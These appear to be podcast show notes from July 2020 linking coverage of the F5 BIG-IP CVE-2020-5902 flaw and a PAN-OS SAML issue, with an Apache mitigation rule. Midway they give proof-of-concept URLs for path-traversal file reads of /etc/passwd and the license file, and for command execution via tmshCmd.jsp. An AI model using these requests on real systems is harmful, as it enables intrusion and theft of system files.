Preview Mode Links will not work in preview mode

Jul 8, 2020

1st: WISP.org PSA from Rachel Tobac (@racheltobac) & @wisporg talking about #shareTheMicInCyber

#SAML PAN-OS: https://twitter.com/RyanLNewington/status/1278074919092289537

 F5 vulnerability:

https://www.wired.com/story/f5-big-ip-networking-vulnerability/

https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/

 

F5 Mitigation (if patching is not immediately possible): https://twitter.com/TeamAresSec/status/1280590730684256258

<LocationMatch ";">

Redirect 404 /

</LocationMatch>

 

https://twitter.com/wugeej/status/1280008779359125504 - Tweet with PoC for the LFI and RCE

F5 Big-IP CVE-2020-5902 LFI and RCE

LFI

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

or /etc/hosts

or /config/bigip.license

RCE

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami

How to cope in a no-win situation:

https://twitter.com/datSecuritychic/status/1280527467569008640

F5 PoC vuln tweet

Semicolon in bash: https://docstore.mik.ua/orelly/unix3/upt/ch28_16.htm#:~:text=When%20the%20shell%20sees%20a,once%20at%20a%20single%20prompt.